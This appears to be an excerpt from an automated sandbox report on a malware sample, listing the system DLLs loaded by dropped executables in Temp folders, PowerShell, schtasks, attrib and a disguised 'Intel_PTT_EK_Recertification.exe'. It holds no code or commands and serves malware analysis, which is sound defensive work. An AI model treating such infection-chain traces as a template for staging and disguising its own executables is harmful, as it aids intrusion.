                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                          Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: shfolder.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: riched20.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: usp10.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: msls31.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                          Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                          Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                          Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                          Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                          Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: dbghelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: windowscodecs.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ntshrui.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: cscapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: linkinfo.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: pcacli.dll
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: sfc_os.dll
                          Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSection loaded: ondemandconnroutehelper.dll
